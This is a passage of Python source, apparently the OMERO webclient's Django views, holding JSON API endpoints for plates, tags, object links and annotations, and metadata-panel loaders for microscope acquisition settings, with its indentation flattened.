screen_id = get_long_or_default(request, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not conn.isValidGroup(group_id):
return HttpResponseForbidden("Not a member of Group: %s" % group_id)
try:
# Get the plates
plates = tree.marshal_plates(
conn=conn, screen_id=screen_id, group_id=group_id, page=page, limit=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"plates": plates})
@login_required()
def api_plate_acquisition_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
plate_id = get_long_or_default(request, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
# Orphaned PlateAcquisitions are not possible so querying without a
# plate is an error
if plate_id is None:
return HttpResponseBadRequest("id (plate) must be specified")
try:
# Get the plate acquisitions
plate_acquisitions = tree.marshal_plate_acquisitions(
conn=conn, plate_id=plate_id, page=page, limit=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"acquisitions": plate_acquisitions})
def get_object_links(conn, parent_type, parent_id, child_type, child_ids):
""" This is just used internally by api_link DELETE below """
if parent_type == "orphaned":
return None
link_type = None
if parent_type == "experimenter":
if child_type in ["dataset", "plate", "tag"]:
# This will be a requested link if a dataset or plate is
# moved from the de facto orphaned datasets/plates, it isn't
# an error, but no link actually needs removing
return None
elif parent_type == "project":
if child_type == "dataset":
link_type = "ProjectDatasetLink"
elif parent_type == "dataset":
if child_type == "image":
link_type = "DatasetImageLink"
elif parent_type == "screen":
if child_type == "plate":
link_type = "ScreenPlateLink"
elif parent_type == "tagset":
if child_type == "tag":
link_type = "AnnotationAnnotationLink"
if not link_type:
raise Http404("json data needs 'parent_type' and 'child_type'")
params = omero.sys.ParametersI()
params.addIds(child_ids)
qs = conn.getQueryService()
# Need to fetch child and parent, otherwise
# AnnotationAnnotationLink is not loaded
q = (
"""
from %s olink join fetch olink.child join fetch olink.parent
where olink.child.id in (:ids)
"""
% link_type
)
if parent_id:
params.add("pid", rlong(parent_id))
q += " and olink.parent.id = :pid"
res = qs.findAllByQuery(q, params, conn.SERVICE_OPTS)
if parent_id is not None and len(res) == 0:
raise Http404(
"No link found for %s-%s to %s-%s"
% (parent_type, parent_id, child_type, child_ids)
)
return link_type, res
def create_link(parent_type, parent_id, child_type, child_id):
""" This is just used internally by api_link DELETE below """
if parent_type == "experimenter":
if child_type == "dataset" or child_type == "plate":
# This is actually not a link that needs creating, this
# dataset/plate is an orphan
return "orphan"
if parent_type == "project":
project = ProjectI(long(parent_id), False)
if child_type == "dataset":
dataset = DatasetI(long(child_id), False)
link = ProjectDatasetLinkI()
link.setParent(project)
link.setChild(dataset)
return link
elif parent_type == "dataset":
dataset = DatasetI(long(parent_id), False)
if child_type == "image":
image = ImageI(long(child_id), False)
link = DatasetImageLinkI()
link.setParent(dataset)
link.setChild(image)
return link
elif parent_type == "screen":
screen = ScreenI(long(parent_id), False)
if child_type == "plate":
plate = PlateI(long(child_id), False)
link = ScreenPlateLinkI()
link.setParent(screen)
link.setChild(plate)
return link
elif parent_type == "tagset":
if child_type == "tag":
link = AnnotationAnnotationLinkI()
link.setParent(TagAnnotationI(long(parent_id), False))
link.setChild(TagAnnotationI(long(child_id), False))
return link
return None
def get_objects_owners(conn, child_type, child_ids):
"""
Returns a dict of child_id: owner_id
"""
if child_type == "tag":
child_type = "Annotation"
owners = {}
for obj in conn.getObjects(child_type, child_ids):
owners[obj.id] = obj.details.owner.id.val
return owners
@login_required()
def api_links(request, conn=None, **kwargs):
"""
Entry point for the api_links methods.
We delegate depending on request method to
create or delete links between objects.
"""
if request.method not in ["POST", "DELETE"]:
return JsonResponse(
{"Error": "Need to POST or DELETE JSON data to update links"}, status=405
)
# Handle link creation/deletion
try:
json_data = json.loads(request.body)
except TypeError:
# for Python 3.5
json_data = json.loads(bytes_to_native_str(request.body))
if request.method == "POST":
return _api_links_POST(conn, json_data)
elif request.method == "DELETE":
return _api_links_DELETE(conn, json_data)
def _api_links_POST(conn, json_data, **kwargs):
"""Creates links between objects specified by a json
blob in the request body.
e.g. {"dataset":{"10":{"image":[1,2,3]}}}
When creating a link, fails silently if ValidationException
(E.g. adding an image to a Dataset that already has that image).
"""
response = {"success": False}
# json is [parent_type][parent_id][child_type][childIds]
# e.g. {"dataset":{"10":{"image":[1,2,3]}}}
linksToSave = []
write_owned = "WriteOwned" in conn.getCurrentAdminPrivileges()
user_id = conn.getUserId()
for parent_type, parents in json_data.items():
if parent_type in ("orphaned", "experimenter"):
continue
for parent_id, children in parents.items():
for child_type, child_ids in children.items():
# batch look-up owners of all child objects
child_owners = get_objects_owners(conn, child_type, child_ids)
for child_id in child_ids:
parent_id = int(parent_id)
link = create_link(parent_type, parent_id, child_type, child_id)
if link and link != "orphan":
# link owner should match child owner
if write_owned and child_owners[child_id] != user_id:
link.details.owner = ExperimenterI(
child_owners[child_id], False
)
linksToSave.append(link)
if len(linksToSave) > 0:
# Need to set context to correct group (E.g parent group)
ptype = parent_type.title()
if ptype in ["Tagset", "Tag"]:
ptype = "TagAnnotation"
p = conn.getQueryService().get(ptype, parent_id, conn.SERVICE_OPTS)
conn.SERVICE_OPTS.setOmeroGroup(p.details.group.id.val)
logger.info("api_link: Saving %s links" % len(linksToSave))
try:
# We try to save all at once, for speed.
conn.saveArray(linksToSave)
response["success"] = True
except Exception:
logger.info(
"api_link: Exception on saveArray with %s links" % len(linksToSave)
)
# If this fails, e.g. ValidationException because link
# already exists, try to save individual links
for link in linksToSave:
try:
conn.saveObject(link)
except Exception:
pass
response["success"] = True
return JsonResponse(response)
def _api_links_DELETE(conn, json_data):
"""Deletes links between objects specified by a json
blob in the request body.
e.g. {"dataset":{"10":{"image":[1,2,3]}}}
"""
response = {"success": False}
# json is [parent_type][parent_id][child_type][childIds]
# e.g. {"dataset":{"10":{"image":[1,2,3]}}}
for parent_type, parents in json_data.items():
if parent_type == "orphaned":
continue
for parent_id, children in parents.items():
for child_type, child_ids in children.items():
objLnks = get_object_links(
conn, parent_type, parent_id, child_type, child_ids
)
if objLnks is None:
continue
linkType, links = objLnks
linkIds = [r.id.val for r in links]
logger.info("api_link: Deleting %s links" % len(linkIds))
conn.deleteObjects(linkType, linkIds, wait=True)
# webclient needs to know what is orphaned
linkType, remainingLinks = get_object_links(
conn, parent_type, None, child_type, child_ids
)
# return remaining links in same format as json above
# e.g. {"dataset":{"10":{"image":[1,2,3]}}}
for rl in remainingLinks:
pid = rl.parent.id.val
cid = rl.child.id.val
# Deleting links still in progress above - ignore these
if pid == int(parent_id):
continue
if parent_type not in response:
response[parent_type] = {}
if pid not in response[parent_type]:
response[parent_type][pid] = {child_type: []}
response[parent_type][pid][child_type].append(cid)
# If we got here, DELETE was OK
response["success"] = True
return JsonResponse(response)
@login_required()
def api_parent_links(request, conn=None, **kwargs):
"""
Get a list of links as
{'data': [{id: 12, child:{type:'image', id:1},
parent:{type:'dataset', id:2}] }
Supports ?image=1,2 and ?image=1&image=2
"""
parent_types = {"image": "dataset", "dataset": "project", "plate": "screen"}
parents = []
for child_type, parent_type in parent_types.items():
ids = request.GET.getlist(child_type)
if len(ids) == 0:
continue
# support for ?image=1,2
child_ids = []
for id in ids:
for i in id.split(","):
child_ids.append(i)
link_type, result = get_object_links(
conn, parent_type, None, child_type, child_ids
)
for link in result:
parents.append(
{
"id": link.id.val,
"parent": {"type": parent_type, "id": link.parent.id.val},
"child": {"type": child_type, "id": link.child.id.val},
}
)
return JsonResponse({"data": parents})
@login_required()
def api_paths_to_object(request, conn=None, **kwargs):
"""
This finds the paths to objects in the hierarchy. It returns only
the path, not the object hierarchy itself.
An example usage is for the 'show' functionality
Example to go to the image with id 1 somewhere in the tree.
http://localhost:8000/webclient/?show=image-1
This method can tell the webclient exactly what needs to be
dynamically loaded to display this in the jstree.
"""
try:
experimenter_id = get_long_or_default(request, "experimenter", None)
project_id = get_long_or_default(request, "project", None)
dataset_id = get_long_or_default(request, "dataset", None)
image_id = get_long_or_default(request, "image", None)
screen_id = get_long_or_default(request, "screen", None)
plate_id = get_long_or_default(request, "plate", None)
acquisition_id = get_long_or_default(request, "run", None)
# acquisition will override 'run' if both are specified as they are
# the same thing
acquisition_id = get_long_or_default(request, "acquisition", acquisition_id)
well_id = request.GET.get("well", None)
tag_id = get_long_or_default(request, "tag", None)
tagset_id = get_long_or_default(request, "tagset", None)
roi_id = get_long_or_default(request, "roi", None)
shape_id = get_long_or_default(request, "shape", None)
group_id = get_long_or_default(request, "group", None)
page_size = get_long_or_default(request, "page_size", settings.PAGE)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if tag_id is not None or tagset_id is not None:
paths = paths_to_tag(conn, experimenter_id, tagset_id, tag_id)
else:
paths = paths_to_object(
conn,
experimenter_id,
project_id,
dataset_id,
image_id,
screen_id,
plate_id,
acquisition_id,
well_id,
group_id,
page_size,
roi_id,
shape_id,
)
return JsonResponse({"paths": paths})
@login_required()
def api_tags_and_tagged_list(request, conn=None, **kwargs):
if request.method == "GET":
return api_tags_and_tagged_list_GET(request, conn, **kwargs)
elif request.method == "DELETE":
return api_tags_and_tagged_list_DELETE(request, conn, **kwargs)
def api_tags_and_tagged_list_GET(request, conn=None, **kwargs):
"""Get a list of tags
Specifiying tag_id will return any sub-tags, sub-tagsets and
objects tagged with that id
If no tagset_id is specifed it will return tags which have no
parent
"""
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
group_id = get_long_or_default(request, "group", -1)
tag_id = get_long_or_default(request, "id", None)
experimenter_id = get_long_or_default(request, "experimenter_id", -1)
orphaned = get_bool_or_default(request, "orphaned", False)
load_pixels = get_bool_or_default(request, "sizeXYZ", False)
date = get_bool_or_default(request, "date", False)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
try:
# Get ALL data (all owners) under specified tags
if tag_id is not None:
tagged = tree.marshal_tagged(
conn=conn,
experimenter_id=experimenter_id,
tag_id=tag_id,
group_id=group_id,
page=page,
load_pixels=load_pixels,
date=date,
limit=limit,
)
else:
tagged = {}
# Get 'tags' under tag_id
tagged["tags"] = tree.marshal_tags(
conn=conn,
orphaned=orphaned,
experimenter_id=experimenter_id,
tag_id=tag_id,
group_id=group_id,
page=page,
limit=limit,
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse(tagged)
def api_tags_and_tagged_list_DELETE(request, conn=None, **kwargs):
"""Delete the listed tags by ids"""
# Get parameters
try:
tag_ids = get_longs(request, "id")
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
dcs = list()
handle = None
try:
for tag_id in tag_ids:
dcs.append(omero.cmd.Delete("/Annotation", tag_id))
doall = omero.cmd.DoAll()
doall.requests = dcs
handle = conn.c.sf.submit(doall, conn.SERVICE_OPTS)
try:
conn._waitOnCmd(handle)
finally:
handle.close()
except CmdError as e:
return HttpResponseBadRequest(e.message)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse("")
@login_required()
def api_annotations(request, conn=None, **kwargs):
r = request.GET
image_ids = get_list(request, "image")
dataset_ids = get_list(request, "dataset")
project_ids = get_list(request, "project")
screen_ids = get_list(request, "screen")
plate_ids = get_list(request, "plate")
run_ids = get_list(request, "acquisition")
well_ids = get_list(request, "well")
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", ANNOTATIONS_LIMIT)
ann_type = r.get("type", None)
ns = r.get("ns", None)
anns, exps = tree.marshal_annotations(
conn,
project_ids=project_ids,
dataset_ids=dataset_ids,
image_ids=image_ids,
screen_ids=screen_ids,
plate_ids=plate_ids,
run_ids=run_ids,
well_ids=well_ids,
ann_type=ann_type,
ns=ns,
page=page,
limit=limit,
)
return JsonResponse({"annotations": anns, "experimenters": exps})
@login_required()
def api_share_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
member_id = get_long_or_default(request, "member_id", -1)
owner_id = get_long_or_default(request, "owner_id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
# Like with api_container_list, this is a combination of
# results which will each be able to return up to the limit in page
# size
try:
# Get the shares
shares = tree.marshal_shares(
conn=conn, member_id=member_id, owner_id=owner_id, page=page, limit=limit
)
# Get the discussions
discussions = tree.marshal_discussions(
conn=conn, member_id=member_id, owner_id=owner_id, page=page, limit=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"shares": shares, "discussions": discussions})
@login_required()
@render_response()
def load_plate(request, o1_type=None, o1_id=None, conn=None, **kwargs):
"""
This loads data for the center panel, via AJAX calls.
Used for Datasets, Plates & Orphaned Images.
"""
# get index of the plate
index = getIntOrDefault(request, "index", 0)
# prepare data. E.g. kw = {} or {'plate': 301L} or
# 'acquisition': 301L}
kw = dict()
if o1_type is not None:
if o1_id is not None and int(o1_id) > 0:
kw[str(o1_type)] = long(o1_id)
try:
manager = BaseContainer(conn, **kw)
except AttributeError as x:
return handlerInternalError(request, x)
# prepare forms
form_well_index = None
context = {"manager": manager, "form_well_index": form_well_index, "index": index}
# load data & template
template = None
if "plate" in kw or "acquisition" in kw:
fields = manager.getNumberOfFields()
if fields is not None:
form_well_index = WellIndexForm(initial={"index": index, "range": fields})
if index == 0:
index = fields[0]
# Show parameter will be well-1|well-2
show = request.GET.get("show")
if show is not None:
wells_to_select = []
for w in show.split("|"):
if "well-" in w:
wells_to_select.append(w.replace("well-", ""))
context["select_wells"] = ",".join(wells_to_select)
context["baseurl"] = reverse("webgateway").rstrip("/")
context["form_well_index"] = form_well_index
context["index"] = index
context["thumbnails_batch"] = settings.THUMBNAILS_BATCH
template = "webclient/data/plate.html"
if o1_type == "acquisition":
context["acquisition"] = o1_id
context["isLeader"] = conn.isLeader()
context["template"] = template
return context
@login_required()
@render_response()
def load_chgrp_groups(request, conn=None, **kwargs):
"""
Get the potential groups we can move selected data to.
These will be groups that the owner(s) of selected objects is a member of.
Objects are specified by query string like: ?Image=1,2&Dataset=3
If no selected objects are specified, simply list the groups that the
current user is a member of.
Groups list will exclude the 'current' group context.
"""
ownerIds = []
currentGroups = set()
groupSets = []
groups = {}
owners = {}
for dtype in ("Project", "Dataset", "Image", "Screen", "Plate"):
oids = request.GET.get(dtype, None)
if oids is not None:
for o in conn.getObjects(dtype, oids.split(",")):
ownerIds.append(o.getDetails().owner.id.val)
currentGroups.add(o.getDetails().group.id.val)
ownerIds = list(set(ownerIds))
# In case we were passed no objects or they weren't found
if len(ownerIds) == 0:
ownerIds = [conn.getUserId()]
for owner in conn.getObjects(
"Experimenter", ownerIds, opts={"load_experimentergroups": True}
):
# Each owner has a set of groups
gids = []
owners[owner.id] = owner.getFullName()
for group in owner.copyGroupExperimenterMap():
groups[group.parent.id.val] = group.parent
gids.append(group.parent.id.val)
groupSets.append(set(gids))
# Can move to groups that all owners are members of...
targetGroupIds = set.intersection(*groupSets)
# ...but not 'user' group
userGroupId = conn.getAdminService().getSecurityRoles().userGroupId
if userGroupId in targetGroupIds:
targetGroupIds.remove(userGroupId)
# if all the Objects are in a single group, exclude it from the target
# groups
if len(currentGroups) == 1:
curr_grp = currentGroups.pop()
if curr_grp in targetGroupIds:
targetGroupIds.remove(curr_grp)
def getPerms(group):
p = group.getDetails().permissions
return {
"write": p.isGroupWrite(),
"annotate": p.isGroupAnnotate(),
"read": p.isGroupRead(),
}
# From groupIds, create a list of group dicts for json
targetGroups = []
for gid in targetGroupIds:
targetGroups.append(
{"id": gid, "name": groups[gid].name.val, "perms": getPerms(groups[gid])}
)
targetGroups.sort(key=lambda x: x["name"])
owners = [[k, v] for k, v in owners.items()]
return {"owners": owners, "groups": targetGroups}
@login_required()
@render_response()
def load_chgrp_target(request, group_id, target_type, conn=None, **kwargs):
""" Loads a tree for user to pick target Project, Dataset or Screen """
# filter by group (not switching group)
conn.SERVICE_OPTS.setOmeroGroup(int(group_id))
owner = getIntOrDefault(request, "owner", None)
manager = BaseContainer(conn)
manager.listContainerHierarchy(owner)
template = "webclient/data/chgrp_target_tree.html"
context = {"manager": manager, "target_type": target_type, "template": template}
return context
@login_required()
@render_response()
def load_searching(request, form=None, conn=None, **kwargs):
"""
Handles AJAX calls to search
"""
manager = BaseSearch(conn)
foundById = []
# form = 'form' if we are searching. Get query from request...
r = request.GET
if form is not None:
query_search = r.get("query", None)
if query_search is None:
return HttpResponse("No search '?query' included")
query_search = query_search.replace("+", " ")
advanced = toBoolean(r.get("advanced"))
# If this is an advanced search use 'advanced_search' for query
if advanced:
query_search = r.get("advanced_search")
template = "webclient/search/search_details.html"
onlyTypes = r.getlist("datatype")
fields = r.getlist("field")
searchGroup = r.get("searchGroup", None)
ownedBy = r.get("ownedBy", None)
useAcquisitionDate = toBoolean(r.get("useAcquisitionDate"))
startdate = r.get("startdateinput", None)
startdate = startdate is not None and smart_str(startdate) or None
enddate = r.get("enddateinput", None)
enddate = enddate is not None and smart_str(enddate) or None
date = None
if startdate is not None:
if enddate is None:
n = datetime.datetime.now()
enddate = "%s-%02d-%02d" % (n.year, n.month, n.day)
date = "%s_%s" % (startdate, enddate)
# by default, if user has not specified any types:
if len(onlyTypes) == 0:
onlyTypes = ["images"]
# search is carried out and results are stored in
# manager.containers.images etc.
manager.search(
query_search,
onlyTypes,
fields,
searchGroup,
ownedBy,
useAcquisitionDate,
date,
rawQuery=advanced,
)
# if the query is only numbers (separated by commas or spaces)
# we search for objects by ID
isIds = re.compile(r"^[\d ,]+$")
if isIds.search(query_search) is not None:
conn.SERVICE_OPTS.setOmeroGroup(-1)
idSet = set()
for queryId in re.split(" |,", query_search):
if len(queryId) == 0:
continue
try:
searchById = long(queryId)
if searchById in idSet:
continue
idSet.add(searchById)
for t in onlyTypes:
t = t[0:-1] # remove 's'
if t in (
"project",
"dataset",
"image",
"screen",
"plate",
"well",
):
obj = conn.getObject(t, searchById)
if obj is not None:
foundById.append({"otype": t, "obj": obj})
except ValueError:
pass
else:
# simply display the search home page.
template = "webclient/search/search.html"
context = {
"manager": manager,
"foundById": foundById,
"resultCount": manager.c_size + len(foundById),
}
context["template"] = template
context["thumbnails_batch"] = settings.THUMBNAILS_BATCH
return context
@login_required()
@render_response()
def load_metadata_details(request, c_type, c_id, conn=None, share_id=None, **kwargs):
"""
This page is the right-hand panel 'general metadata', first tab only.
Shown for Projects, Datasets, Images, Screens, Plates, Wells, Tags etc.
The data and annotations are loaded by the manager. Display of appropriate
data is handled by the template.
"""
# the index of a field within a well
index = getIntOrDefault(request, "index", 0)
context = dict()
# we only expect a single object, but forms can take multiple objects
images = c_type == "image" and list(conn.getObjects("Image", [c_id])) or list()
datasets = (
c_type == "dataset" and list(conn.getObjects("Dataset", [c_id])) or list()
)
projects = (
c_type == "project" and list(conn.getObjects("Project", [c_id])) or list()
)
screens = c_type == "screen" and list(conn.getObjects("Screen", [c_id])) or list()
plates = c_type == "plate" and list(conn.getObjects("Plate", [c_id])) or list()
acquisitions = (
c_type == "acquisition"
and list(conn.getObjects("PlateAcquisition", [c_id]))
or list()
)
shares = (
(c_type == "share" or c_type == "discussion")
and [conn.getShare(c_id)]
or list()
)
wells = c_type == "well" and list(conn.getObjects("Well", [c_id])) or list()
# we simply set up the annotation form, passing the objects to be
# annotated.
selected = {
"images": c_type == "image" and [c_id] or [],
"datasets": c_type == "dataset" and [c_id] or [],
"projects": c_type == "project" and [c_id] or [],
"screens": c_type == "screen" and [c_id] or [],
"plates": c_type == "plate" and [c_id] or [],
"acquisitions": c_type == "acquisition" and [c_id] or [],
"wells": c_type == "well" and [c_id] or [],
"shares": ((c_type == "share" or c_type == "discussion") and [c_id] or []),
}
initial = {
"selected": selected,
"images": images,
"datasets": datasets,
"projects": projects,
"screens": screens,
"plates": plates,
"acquisitions": acquisitions,
"wells": wells,
"shares": shares,
}
form_comment = None
figScripts = None
if c_type in ("share", "discussion"):
template = "webclient/annotations/annotations_share.html"
manager = BaseShare(conn, c_id)
manager.getAllUsers(c_id)
manager.getComments(c_id)
form_comment = CommentAnnotationForm(initial=initial)
else:
try:
manager = BaseContainer(conn, **{str(c_type): long(c_id), "index": index})
except AttributeError as x:
return handlerInternalError(request, x)
if share_id is not None:
template = "webclient/annotations/annotations_share.html"
context["share"] = BaseShare(conn, share_id)
else:
template = "webclient/annotations/metadata_general.html"
context["canExportAsJpg"] = manager.canExportAsJpg(request)
context["annotationCounts"] = manager.getAnnotationCounts()
figScripts = manager.listFigureScripts()
context["manager"] = manager
if c_type in ("tag", "tagset"):
context["insight_ns"] = omero.rtypes.rstring(
omero.constants.metadata.NSINSIGHTTAGSET
).val
if form_comment is not None:
context["form_comment"] = form_comment
context["figScripts"] = figScripts
context["template"] = template
context["webclient_path"] = reverse("webindex")
return context
@login_required()
@render_response()
def load_metadata_preview(request, c_type, c_id, conn=None, share_id=None, **kwargs):
"""
This is the image 'Preview' tab for the right-hand panel.
"""
context = {}
# the index of a field within a well
index = getIntOrDefault(request, "index", 0)
manager = BaseContainer(conn, **{str(c_type): long(c_id)})
if share_id:
context["share"] = BaseShare(conn, share_id)
if c_type == "well":
manager.image = manager.well.getImage(index)
allRdefs = manager.image.getAllRenderingDefs()
rdefs = {}
rdefId = manager.image.getRenderingDefId()
# remove duplicates per user
for r in allRdefs:
ownerId = r["owner"]["id"]
r["current"] = r["id"] == rdefId
# if duplicate rdefs for user, pick one with highest ID
if ownerId not in rdefs or rdefs[ownerId]["id"] < r["id"]:
rdefs[ownerId] = r
rdefs = rdefs.values()
# format into rdef strings,
# E.g. {c: '1|3118:35825$FF0000,2|2086:18975$FFFF00', m: 'c'}
rdefQueries = []
for r in rdefs:
chs = []
for i, c in enumerate(r["c"]):
act = "-"
if c["active"]:
act = ""
color = c["lut"] if "lut" in c else c["color"]
reverse = "r" if c["inverted"] else "-r"
chs.append(
"%s%s|%s:%s%s$%s" % (act, i + 1, c["start"], c["end"], reverse, color)
)
rdefQueries.append(
{
"id": r["id"],
"owner": r["owner"],
"c": ",".join(chs),
"m": r["model"] == "greyscale" and "g" or "c",
}
)
max_w, max_h = conn.getMaxPlaneSize()
size_x = manager.image.getSizeX()
size_y = manager.image.getSizeY()
context["tiledImage"] = (size_x * size_y) > (max_w * max_h)
context["manager"] = manager
context["rdefsJson"] = json.dumps(rdefQueries)
context["rdefs"] = rdefs
context["template"] = "webclient/annotations/metadata_preview.html"
return context
@login_required()
@render_response()
def load_metadata_hierarchy(request, c_type, c_id, conn=None, **kwargs):
"""
This loads the ancestors of the specified object and displays them in a
static tree.
Used by an AJAX call from the metadata_general panel.
"""
manager = BaseContainer(conn, **{str(c_type): long(c_id)})
context = {"manager": manager}
context["template"] = "webclient/annotations/metadata_hierarchy.html"
return context
@login_required()
@render_response()
def load_metadata_acquisition(
request, c_type, c_id, conn=None, share_id=None, **kwargs
):
"""
The acquisition tab of the right-hand panel. Only loaded for images.
TODO: urls regex should make sure that c_type is only 'image' OR 'well'
"""
try:
if c_type in ("share", "discussion"):
template = "webclient/annotations/annotations_share.html"
manager = BaseShare(conn, c_id)
manager.getAllUsers(c_id)
manager.getComments(c_id)
else:
template = "webclient/annotations/metadata_acquisition.html"
manager = BaseContainer(conn, **{str(c_type): long(c_id)})
except AttributeError as x:
return handlerInternalError(request, x)
form_environment = None
form_objective = None
form_microscope = None
form_instrument_objectives = list()
form_stageLabel = None
form_filters = list()
form_dichroics = list()
form_detectors = list()
form_channels = list()
form_lasers = list()
lasertypes = list(conn.getEnumerationEntries("LaserType"))
arctypes = list(conn.getEnumerationEntries("ArcType"))
filamenttypes = list(conn.getEnumerationEntries("FilamentType"))
# various enums we need for the forms (don't load unless needed)
mediums = None
immersions = None
corrections = None
if c_type == "image":
if share_id is None:
manager.companionFiles()
manager.channelMetadata()
for theC, ch in enumerate(manager.channel_metadata):
logicalChannel = ch.getLogicalChannel()
if logicalChannel is not None:
channel = dict()
channel["form"] = MetadataChannelForm(
initial={
"logicalChannel": logicalChannel,
"exWave": ch.getExcitationWave(units=True),
"emWave": ch.getEmissionWave(units=True),
"illuminations": list(
conn.getEnumerationEntries("IlluminationI")
),
"contrastMethods": list(
conn.getEnumerationEntries("ContrastMethodI")
),
"modes": list(conn.getEnumerationEntries("AcquisitionModeI")),
}
)
# 9853 Much metadata is not available to 'shares'
if share_id is None:
lightPath = logicalChannel.getLightPath()
if lightPath is not None:
channel["form_dichroic"] = None
channel["form_excitation_filters"] = list()
channel["form_emission_filters"] = list()
lightPathDichroic = lightPath.getDichroic()
if lightPathDichroic is not None:
channel["form_dichroic"] = MetadataDichroicForm(
initial={"dichroic": lightPathDichroic}
)
filterTypes = list(conn.getEnumerationEntries("FilterTypeI"))
for f in lightPath.getEmissionFilters():
channel["form_emission_filters"].append(
MetadataFilterForm(
initial={"filter": f, "types": filterTypes}
)
)
for f in lightPath.getExcitationFilters():
channel["form_excitation_filters"].append(
MetadataFilterForm(
initial={"filter": f, "types": filterTypes}
)
)
detectorSettings = logicalChannel.getDetectorSettings()
if (
detectorSettings._obj is not None
and detectorSettings.getDetector()
):
channel["form_detector_settings"] = MetadataDetectorForm(
initial={
"detectorSettings": detectorSettings,
"detector": detectorSettings.getDetector(),
"types": list(
conn.getEnumerationEntries("DetectorTypeI")
),
"binnings": list(conn.getEnumerationEntries("Binning")),
}
)
lightSourceSettings = logicalChannel.getLightSourceSettings()
if (
lightSourceSettings is not None
and lightSourceSettings._obj is not None
):
lightSrc = lightSourceSettings.getLightSource()
if lightSrc is not None:
lstypes = lasertypes
if lightSrc.OMERO_CLASS == "Arc":
lstypes = arctypes
elif lightSrc.OMERO_CLASS == "Filament":
lstypes = filamenttypes
channel["form_light_source"] = MetadataLightSourceForm(
initial={
"lightSource": lightSrc,
"lightSourceSettings": lightSourceSettings,
"lstypes": lstypes,
"mediums": list(
conn.getEnumerationEntries("LaserMediumI")
),
"pulses": list(
conn.getEnumerationEntries("PulseI")
),
}
)
# TODO: We don't display filter sets here yet since they are
# not populated on Import by BioFormats.
channel["label"] = ch.getLabel()
color = ch.getColor()
channel["color"] = color is not None and color.getHtml() or None
planeInfo = (
manager.image
and manager.image.getPrimaryPixels().copyPlaneInfo(
theC=theC, theZ=0
)
)
plane_info = []
for pi in planeInfo:
deltaT = pi.getDeltaT(units="SECOND")
exposure = pi.getExposureTime(units="SECOND")
if deltaT is None and exposure is None:
continue
if deltaT is not None:
deltaT = deltaT.getValue()
if exposure is not None:
exposure = exposure.getValue()
plane_info.append(
{"theT": pi.theT, "deltaT": deltaT, "exposureTime": exposure}
)
channel["plane_info"] = plane_info
form_channels.append(channel)
try:
image = manager.well.getWellSample().image()
except Exception:
image = manager.image
if share_id is None: # 9853
if image.getObjectiveSettings() is not None:
# load the enums if needed and create our Objective Form
if mediums is None:
mediums = list(conn.getEnumerationEntries("MediumI"))
if immersions is None:
immersions = list(conn.getEnumerationEntries("ImmersionI"))
if corrections is None:
corrections = list(conn.getEnumerationEntries("CorrectionI"))
form_objective = MetadataObjectiveSettingsForm(
initial={
"objectiveSettings": image.getObjectiveSettings(),
"objective": image.getObjectiveSettings().getObjective(),
"mediums": mediums,
"immersions": immersions,
"corrections": corrections,
}
)
if image.getImagingEnvironment() is not None:
form_environment = MetadataEnvironmentForm(initial={"image": image})
if image.getStageLabel() is not None:
form_stageLabel = MetadataStageLabelForm(initial={"image": image})
instrument = image.getInstrument()
if instrument is not None:
if instrument.getMicroscope() is not None:
form_microscope = MetadataMicroscopeForm(
initial={
"microscopeTypes": list(
conn.getEnumerationEntries("MicroscopeTypeI")
),
"microscope": instrument.getMicroscope(),
}
)
objectives = instrument.getObjectives()
for o in objectives:
# load the enums if needed and create our Objective Form
if mediums is None:
mediums = list(conn.getEnumerationEntries("MediumI"))
if immersions is None:
immersions = list(conn.getEnumerationEntries("ImmersionI"))
if corrections is None:
corrections = list(conn.getEnumerationEntries("CorrectionI"))
obj_form = MetadataObjectiveForm(
initial={
"objective": o,
"mediums": mediums,
"immersions": immersions,
"corrections": corrections,
}
)
form_instrument_objectives.append(obj_form)
filters = list(instrument.getFilters())
if len(filters) > 0:
for f in filters:
form_filter = MetadataFilterForm(
initial={
"filter": f,
"types": list(
conn.getEnumerationEntries("FilterTypeI")
),
}
)
form_filters.append(form_filter)
dichroics = list(instrument.getDichroics())
for d in dichroics:
form_dichroic = MetadataDichroicForm(initial={"dichroic": d})
form_dichroics.append(form_dichroic)
detectors = list(instrument.getDetectors())
if len(detectors) > 0:
for d in detectors:
form_detector = MetadataDetectorForm(
initial={
"detectorSettings": None,
"detector": d,
"types": list(
conn.getEnumerationEntries("DetectorTypeI")
),
}
)
form_detectors.append(form_detector)
lasers = list(instrument.getLightSources())
if len(lasers) > 0:
for laser in lasers:
lstypes = lasertypes
if laser.OMERO_CLASS == "Arc":
lstypes = arctypes
elif laser.OMERO_CLASS == "Filament":
lstypes = filamenttypes
form_laser = MetadataLightSourceForm(
initial={
"lightSource": laser,
"lstypes": lstypes,
"mediums": list(
conn.getEnumerationEntries("LaserMediumI")
),
"pulses": list(conn.getEnumerationEntries("PulseI")),
}
)
form_lasers.append(form_laser)
